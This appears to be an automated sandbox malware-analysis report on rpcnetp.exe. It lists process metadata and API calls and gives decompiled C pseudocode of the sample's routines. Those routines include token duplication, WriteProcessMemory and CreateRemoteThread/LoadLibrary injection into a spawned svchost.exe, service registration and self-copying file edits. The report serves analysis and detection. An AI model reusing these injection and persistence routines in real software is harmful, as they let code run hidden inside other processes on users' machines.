Analysis Process: iexplore.exe PID: 7148 Parent PID: 7116

Function Logs

General

Start time:	21:23:41
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Imagebase:	0xfa0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Created

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Thread Created

Thread Execution Resumed

Thread Information Set

Show Windows behavior

Memory Activities

Memory Read

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

User Timer set

Show Windows behavior

Windows UI Activities

Window Created

Show Windows behavior

Network Activities

Show Windows behavior

Object Security Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: svchost.exe PID: 6480 Parent PID: 568

Function Logs

General

Start time:	21:23:50
Start date:	07/10/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Process Information Set

Show Windows behavior

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

System Information Queried

Show Windows behavior

Timing Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Disassembly

Code Analysis

Analysis Process: rpcnetp.exe PID: 7072 Parent PID: 568 rpcnetp.exeCOMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	97.5%
Signature Coverage:	11.8%
Total number of Nodes:	813
Total number of Limit Nodes:	14

Executed Functions

Function 00A12ADB, Relevance: 21.2, APIs: 14, Instructions: 185
processthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00A12ADB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t70;
				int _t83;
				int _t84;
				void* _t91;
				int _t101;
				void* _t117;
				struct _STARTUPINFOA _t120;
				void** _t121;
				void* _t124;

				_t117 = __ecx;
				_push(0x180);
				_push(0xa15410);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t124 - 0x1c) = 0;
				 *(_t124 - 0x3c) = 0;
				 *((intOrPtr*)(_t124 - 0x24)) =  *((intOrPtr*)( *0xa16008 + 0x34));
				 *(_t124 - 0x40) = 0;
				 *(_t124 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t124 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t124 - 4) =  *(_t124 - 4) | 0xffffffff;
					E00A12D0B(0);
					return E00A1159C( *(_t124 - 0x1c));
				} else {
					_t120 = 0x44;
					E00A14D2D(_t124 - 0x8c, 0, _t120);
					 *(_t124 - 0x8c) = _t120;
					 *((short*)(_t124 - 0x5c)) = 0;
					 *((intOrPtr*)(_t124 - 0x60)) = 0x181;
					 *(_t124 - 0x4c) =  *(_t124 - 0x38);
					if( *((intOrPtr*)(_t124 - 0x24)) == 0 || E00A12598(_t124 - 0x190, 0x104) == 0) {
						E00A12842(_t124 - 0x190, 1);
					}
					if( *(_t124 + 8) == 0) {
						_t83 = CreateProcessA(0, _t124 - 0x190, 0, 0, 1, 4, 0, 0, _t124 - 0x8c, _t124 - 0x34); // executed
						 *(_t124 - 0x1c) = _t83;
					} else {
						_t121 = _t124 + 8;
						 *(_t124 - 0x20) = 0;
						 *(_t124 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t124 + 8), 0x2000000, 0, 0, 1, _t124 - 0x20) != 0) {
							SetTokenInformation( *(_t124 - 0x20), 0xc, _t124 - 0x44, 4);
							_t121 = _t124 - 0x20;
						}
						_push(0);
						_push( *_t121);
						_push(_t124 - 0x40);
						L00A1446E();
						 *(_t124 - 0x1c) = CreateProcessAsUserA( *_t121, 0, _t124 - 0x190, 0, 0, 1, 0x404,  *(_t124 - 0x40), 0, _t124 - 0x8c, _t124 - 0x34);
						if( *(_t124 - 0x20) != 0) {
							CloseHandle( *(_t124 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
						L13:
						_t84 =  *(_t124 - 0x1c);
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
							_t84 =  *0xa160c4;
						}
						WriteProcessMemory( *(_t124 - 0x34), _t84 -  *0xa160c4 + 0xa160c8, 0xa160c8, 0x80, 0); // executed
						if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
							ResumeThread( *(_t124 - 0x30));
							goto L23;
						} else {
							E00A124BC(0xa160c8,  *(_t124 - 0x34),  *((intOrPtr*)( *0xa16008 + 0x34)), 0, 0, _t124 - 0x1c, 0); // executed
							if( *(_t124 - 0x1c) != 0) {
								L23:
								if( *0xa16038 != 0) {
									E00A12758( *(_t124 - 0x34));
									 *(_t124 - 0x34) = 0;
								} else {
									_t91 = CreateThread(0, 0, E00A12758,  *(_t124 - 0x34), 0, _t124 - 0x48); // executed
									 *(_t124 - 0x3c) = _t91;
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *(_t124 - 0x1c) == 0) {
							L18:
							if( *(_t124 - 0x34) != 0) {
								TerminateProcess( *(_t124 - 0x34), 0);
								CloseHandle( *(_t124 - 0x34));
							}
							if( *(_t124 - 0x30) != 0) {
								CloseHandle( *(_t124 - 0x30));
							}
							goto L26;
						}
						E00A12842(_t124 - 0x190, 0); // executed
						_t101 = E00A127D2(_t117, _t124 - 0x190,  *(_t124 - 0x34), 0); // executed
						 *(_t124 - 0x1c) = _t101;
						goto L13;
					}
				}
			}

0x00a12adb
0x00a12adb
0x00a12ae0
0x00a12ae5
0x00a12aec
0x00a12aef
0x00a12afa
0x00a12afd
0x00a12b00
0x00a12b13
0x00a12b19
0x00a12b1e
0x00a12cf5
0x00a12cf5
0x00a12cf9
0x00a12d06
0x00a12b24
0x00a12b26
0x00a12b30
0x00a12b35
0x00a12b3d
0x00a12b41
0x00a12b4b
0x00a12b51
0x00a12b70
0x00a12b70
0x00a12b78
0x00a12c10
0x00a12c16
0x00a12b7a
0x00a12b7a
0x00a12b7d
0x00a12b80
0x00a12b9a
0x00a12ba7
0x00a12bad
0x00a12bad
0x00a12bb0
0x00a12bb1
0x00a12bb6
0x00a12bb7
0x00a12be3
0x00a12be9
0x00a12bee
0x00a12bee
0x00a12be9
0x00a12c1c
0x00a12c43
0x00a12c43
0x00a12c48
0x00000000
0x00000000
0x00a12c51
0x00a12c53
0x00a12c53
0x00a12c70
0x00a12c79
0x00a12cc2
0x00000000
0x00a12c7b
0x00a12c8d
0x00a12c95
0x00a12cc8
0x00a12cce
0x00a12ced
0x00a12cf2
0x00a12cd0
0x00a12cdf
0x00a12ce5
0x00a12ce5
0x00000000
0x00a12cce
0x00000000
0x00a12c95
0x00a12c1e
0x00a12c21
0x00a12c97
0x00a12c9a
0x00a12ca0
0x00a12ca9
0x00a12ca9
0x00a12cb2
0x00a12cb7
0x00a12cb7
0x00000000
0x00a12cb2
0x00a12c2b
0x00a12c3b
0x00a12c40
0x00000000
0x00a12c40
0x00a12c1c

APIs

GetCurrentProcessId.KERNEL32(00A15410,00000180,00A132A3,00000000,00000001), ref: 00A12B03
OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 00A12B13
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,?), ref: 00A12B92
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 00A12BA7
CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 00A12BB7
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 00A12BDD
CloseHandle.KERNEL32(?), ref: 00A12BEE
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00A12C10
WriteProcessMemory.KERNELBASE(?,?,00A160C8,00000080,00000000), ref: 00A12C70
TerminateProcess.KERNEL32(?,00000000), ref: 00A12CA0

Part of subcall function 00A12598: GetSystemDirectoryA.KERNEL32(?,?), ref: 00A125AF
Part of subcall function 00A12598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 00A125BD

CloseHandle.KERNEL32(?), ref: 00A12CA9
CloseHandle.KERNEL32(?), ref: 00A12CB7
ResumeThread.KERNEL32(?), ref: 00A12CC2
CreateThread.KERNELBASE(00000000,00000000,Function_00002758,?,00000000,?), ref: 00A12CDF

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
String ID:
API String ID: 1678882957-0
Opcode ID: 4aaf35f9ac2806ffdc51e1ca94e6dbfa22e654cb07cc6ce8ca645301e3bc28b7
Instruction ID: 94f7dac6129bd2c152f180ea16bf99a378b7f0cd7a5dcf7816b8349202cab922
Opcode Fuzzy Hash: 4aaf35f9ac2806ffdc51e1ca94e6dbfa22e654cb07cc6ce8ca645301e3bc28b7
Instruction Fuzzy Hash: AE61B371D02228AFDB21DF91DD49EEEBB79FF08751F108066F605A6160D7309A95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A132DE, Relevance: 18.1, APIs: 12, Instructions: 107
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00A132DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				void* _t13;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t11 = GetVersion();
				_t33 = 0;
				 *0xa160b0 = _t11;
				if( *0xa1608c == 0 && _t11 < 0) {
					 *0xa16038 =  *0xa16038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4);
				_t13 = E00A13420(_t12); // executed
				_t37 = _t13;
				if(_t37 == _t33) {
					L11:
					_t14 =  *0xa16038;
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t37 - _t33;
						if(_t37 != _t33) {
							L17:
							 *0xa160ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E00A13161, _t33, _t33,  &_v16);
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0xa160ac;
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0xa160ac);
									 *0xa160ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E00A12FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t37 - _t33;
					if(_t37 != _t33) {
						goto L17;
					}
					E00A11EDA();
					goto L23;
				} else {
					_t26 =  *0xa16008;
					 *0xa16004 = _t33;
					_t45 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0xa16038 = 1;
						SetStdHandle(0xfffffff6, _v8);
						goto L11;
					}
					 *0xa16038 = 2;
					_t34 = E00A12123(_t33, CloseHandle, _t37, _t45);
					 *( *0xa16008 + 0x28) = 1;
					_t30 = E00A12ADB(_t34, _t35, CloseHandle, _t37, _t45, _t34);
					asm("sbb esi, esi");
					_t37 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t37 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E00A12FBB(_t35, _t37);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}

0x00a132e7
0x00a132ed
0x00a132ef
0x00a132fa
0x00a13300
0x00a13300
0x00a13310
0x00a13313
0x00a1331e
0x00a13322
0x00a1338f
0x00a1338f
0x00a13394
0x00a13396
0x00a133a3
0x00a133a6
0x00000000
0x00000000
0x00a133a8
0x00a133aa
0x00a133b1
0x00a133bb
0x00a133c0
0x00a133cd
0x00a133d3
0x00a133d6
0x00a133d8
0x00a133da
0x00a133e5
0x00a133e7
0x00a133ec
0x00a133f4
0x00a133f6
0x00a133f6
0x00a13401
0x00a13406
0x00a13406
0x00a13409
0x00000000
0x00a13409
0x00a133ac
0x00a133af
0x00000000
0x00000000
0x00000000
0x00a133af
0x00a13398
0x00a1339a
0x00000000
0x00000000
0x00a1339c
0x00000000
0x00a13324
0x00a13324
0x00a13329
0x00a1332f
0x00a13332
0x00a13379
0x00a13385
0x00000000
0x00a13385
0x00a13334
0x00a13343
0x00a1334b
0x00a13352
0x00a1335b
0x00a1335d
0x00a13360
0x00a13363
0x00a13363
0x00a13367
0x00a1338d
0x00a1338d
0x00000000
0x00a13369
0x00a1336a
0x00a1336f
0x00a1340e
0x00a13411
0x00a13416
0x00a13416
0x00a13419
0x00a13419
0x00a13367

APIs

GetVersion.KERNEL32 ref: 00A132E7
GetStdHandle.KERNEL32(000000F4), ref: 00A13309
CloseHandle.KERNEL32(00000000), ref: 00A13363
SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 00A13385
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A133B5
CreateThread.KERNEL32(00000000,00000000,Function_00003161,00000000,00000000,?), ref: 00A133CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A133EC
CloseHandle.KERNEL32 ref: 00A133F4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A13401
CloseHandle.KERNEL32(?), ref: 00A13406
CloseHandle.KERNEL32(?,00000000), ref: 00A13416
ExitProcess.KERNEL32 ref: 00A13419

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
String ID:
API String ID: 2472693224-0
Opcode ID: 9eb75597c1dcf935af69cbe47b1ab0253da16cd132fdb7e25c43925eb284c1eb
Instruction ID: b05ab603d33a8bbd7e11d4ef8abb7e9af2e7640b874ad867f733c5c9b8b2a928
Opcode Fuzzy Hash: 9eb75597c1dcf935af69cbe47b1ab0253da16cd132fdb7e25c43925eb284c1eb
Instruction Fuzzy Hash: FE31C676800214EFCF21EFE59DC49EA7A78AB083A0711C225E625D71A1DB308FC6CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00A127D2, Relevance: 6.0, APIs: 4, Instructions: 48
memorystringinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00A127D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t9;
				int _t13;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t9 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4); // executed
				_t22 = _t9;
				if(_t22 != 0) {
					_t13 = WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0); // executed
					if(_t13 != 0) {
						E00A124BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1); // executed
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x00a127d2
0x00a127d5
0x00a127d6
0x00a127db
0x00a127ec
0x00a127f2
0x00a127f6
0x00a1280a
0x00a12812
0x00a12825
0x00a12825
0x00a12832
0x00a12832
0x00a1283f

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00001000,00001000,00000004), ref: 00A127EC
lstrlenA.KERNEL32(?,00000000), ref: 00A127FD
WriteProcessMemory.KERNELBASE(?,00000000,?,00000001), ref: 00A1280A
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000), ref: 00A12832

Part of subcall function 00A124BC: CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000), ref: 00A124E1
Part of subcall function 00A124BC: CloseHandle.KERNEL32(?), ref: 00A12523

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
String ID:
API String ID: 4087653319-0
Opcode ID: f0ec0ba5758399cee83eb324f4a13f19e329afbb67503b0fa16348af5e65141c
Instruction ID: 5e3993ed9b9bb32cad0a7df1793a3bd231dca192a5486413ed30d15283850265
Opcode Fuzzy Hash: f0ec0ba5758399cee83eb324f4a13f19e329afbb67503b0fa16348af5e65141c
Instruction Fuzzy Hash: 5001D176500244BBD721CBA2DC49FDB3F3CEB89791F108024FB0991090D674D940C774

Uniqueness

Uniqueness Score: -1.00%

Function 00A11EDA, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A11EDA() {

				StartServiceCtrlDispatcherA(0xa16090); // executed
				return  *0xa1601c;
			}

0x00a11edf
0x00a11eea

APIs

StartServiceCtrlDispatcherA.ADVAPI32(00A16090,00A133A1,00000000), ref: 00A11EDF

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: 53791ac34ea6f65f05e67ac19f99a29b9498df4924b5724ce74db7c14f19d3d8
Instruction ID: fb21f4cb0396d115f65d5d7ce3a6b91aec2d8f08c3f6e9689cbb8e7a4cdcac9c
Opcode Fuzzy Hash: 53791ac34ea6f65f05e67ac19f99a29b9498df4924b5724ce74db7c14f19d3d8
Instruction Fuzzy Hash: 27A00278B40240DB8E70DBE4ED49AC87763B74C741300C844E556C2364C669E8C3EA31

Uniqueness

Uniqueness Score: -1.00%

Function 00A12842, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A12842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0xa160c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8); // executed
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0); // executed
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0xa160c4;
							_t40 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0); // executed
							WriteFile(_t48,  &_a8, 2,  &_a4, 0); // executed
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}

0x00a1285d
0x00a12865
0x00a12942
0x00a12942
0x00a1286f
0x00a12876
0x00a12878
0x00a12878
0x00a12888
0x00a12893
0x00a12896
0x00a1289f
0x00a1289f
0x00a128a4
0x00a128ac
0x00a128b6
0x00a128c3
0x00a128cb
0x00a128da
0x00a128e0
0x00a128e5
0x00a128e7
0x00a128ef
0x00a128f5
0x00a128f8
0x00a128fe
0x00a12914
0x00a12900
0x00a12905
0x00a12905
0x00a1291b
0x00a1291f
0x00a12931
0x00a12938
0x00a12938
0x00a128e5
0x00a128cb
0x00000000

APIs

GetModuleFileNameA.KERNEL32(?,00000104), ref: 00A1285D
lstrcpyA.KERNEL32(?,?), ref: 00A12893
lstrlenA.KERNEL32(?), ref: 00A12896
lstrcmpiA.KERNEL32(-00000003,00A112DC), ref: 00A128A4
lstrcpyA.KERNEL32(-00000003,00A112DC), ref: 00A128B6
CopyFileA.KERNEL32 ref: 00A128C3
CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00A128DA
SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00A1291F
WriteFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00A12931
CloseHandle.KERNEL32(00000000), ref: 00A12938

Strings

exe, xrefs: 00A12878
dll, xrefs: 00A1286F

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
String ID: dll$exe
API String ID: 3010676052-2048111982
Opcode ID: 4eb5f2a434dee52a668a620bff137f86e626694c8c1184003288bfff89bcd8d1
Instruction ID: dd06b54f04aa5780a25634731efdf7339108dd4e0b0839c199a087b8049a2ed5
Opcode Fuzzy Hash: 4eb5f2a434dee52a668a620bff137f86e626694c8c1184003288bfff89bcd8d1
Instruction Fuzzy Hash: D9314B75901118BBDB20DFA6DC48FEA3B7CEF497A0F108069FA45D7190D6748A86CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1351D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 95
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A1351D(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				long _t17;
				void* _t18;
				void* _t20;
				void* _t23;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HWND__* _t36;

				_t36 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t36, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t36, 0x113, 0x113, 1) != 0);
					PostQuitMessage(_t31);
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t36, _a8, _a12, _a16); // executed
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0xa16088 = 1;
					 *0xa1602c = _t31;
					 *0xa160b8 = _t31;
					L11:
					if(E00A12EA1(_t34, _a16) == 0) {
						_t20 =  *0xa160ac;
						if(_t20 != _t31) {
							 *0xa16088 = 1;
							SetEvent(_t20);
						}
						if( *0xa16088 != _t31) {
							goto L17;
						} else {
							SetTimer(_t36, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t36, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t36, 0x113, 0x113, 1) != 0);
					E00A1327B(_t34, _t36, 0x113); // executed
					if( *0xa16038 == 0) {
						SetTimer(_t36, 0x64, 0xdbba0, 0); // executed
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}

0x00a13529
0x00a1352d
0x00a13530
0x00a13531
0x00a135f4
0x00a135f7
0x00a13602
0x00a13611
0x00a13616
0x00a13620
0x00a135c0
0x00a135c0
0x00a13632
0x00a13636
0x00a13636
0x00a13622
0x00a1362c
0x00000000
0x00a1362c
0x00a13537
0x00a1353a
0x00a135a1
0x00a135a8
0x00a135ae
0x00a135b4
0x00a135be
0x00a135c4
0x00a135cb
0x00a135ce
0x00a135d5
0x00a135d5
0x00a135e1
0x00000000
0x00a135e3
0x00a135ec
0x00000000
0x00a135ec
0x00a135e1
0x00000000
0x00a135be
0x00a1353c
0x00a13541
0x00a13553
0x00000000
0x00000000
0x00a1355c
0x00a13567
0x00a13576
0x00a1357a
0x00a13587
0x00a13596
0x00a13596
0x00000000
0x00a13587
0x00a13548
0x00000000
0x00000000
0x00000000

APIs

KillTimer.USER32(?,00000064), ref: 00A1355C
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 00A13570
SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 00A13596
SetEvent.KERNEL32(?), ref: 00A135D5
SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 00A135EC
KillTimer.USER32(?,00000064), ref: 00A135F7
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 00A1360B
PostQuitMessage.USER32(00000000), ref: 00A13616
DefWindowProcA.USER32(?,00000011,?,?), ref: 00A1362C

Strings

d, xrefs: 00A1354F

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
String ID: d
API String ID: 2149785620-2564639436
Opcode ID: ab161969736995bb59142e4bd404a1794e6fbd0e1261600aa34e5faa6f1c9fc5
Instruction ID: f111b4850d15c0897b954ae918eabbcee6f5e15aab22f9e57378d39ed036c871
Opcode Fuzzy Hash: ab161969736995bb59142e4bd404a1794e6fbd0e1261600aa34e5faa6f1c9fc5
Instruction Fuzzy Hash: 7031BF72540204BEDF20DFA4AD89FEB7F6EAB15B64F04C018F705E51A1C7758B82DA21

Uniqueness

Uniqueness Score: -1.00%

Function 00A12658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81
synchronizationregistrythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00A12658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0xa160a4 = CreateEventA(0, 1, 0, 0);
				 *0xa16010 = 0x10;
				 *0xa1601c = 0x42a;
				 *0xa16020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E00A11EEB);
				 *0xa160bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0xa16018 = 1; // executed
					E00A12266(); // executed
					 *0xa16018 = 5;
					E00A12266(4, 0, 0); // executed
					E00A12296(); // executed
					 *0xa1601c = 0;
					 *0xa16020 = 0; // executed
					_t11 = CreateThread(0, 0, E00A13161, 0, 0,  &_v12); // executed
					_v8 = _t11;
